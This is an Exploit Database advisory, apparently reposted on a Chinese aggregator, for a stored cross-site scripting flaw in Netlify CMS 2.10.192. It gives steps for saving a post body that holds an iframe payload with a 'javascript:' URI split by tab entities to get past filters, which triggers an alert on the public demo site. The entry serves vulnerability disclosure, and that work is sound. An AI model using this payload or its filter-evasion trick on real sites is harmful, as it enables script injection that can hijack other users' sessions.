Netlify CMS 2.10.192 – Stored Cross-Site Scripting (XSS)

• Exploit Database
• 22 阅读

• 作者： tmrswrr
  日期： 2023-07-11
• 类别：

  • webapps
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/51576/

• # Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)
  # Exploit Author: tmrswrr
  # Vendor Homepage: https://decapcms.org/docs/intro/
  # Software Link: https://github.com/decaporg/decap-cms
  # Version: 2.10.192
  # Tested on: https://cms-demo.netlify.com
  
  
  Description:
  
  1. Go to new post and write body field your payload:
  
  https://cms-demo.netlify.com/#/collections/posts
  
  Payload = <iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe>
  
  2. After save it XSS payload will executed and see alert box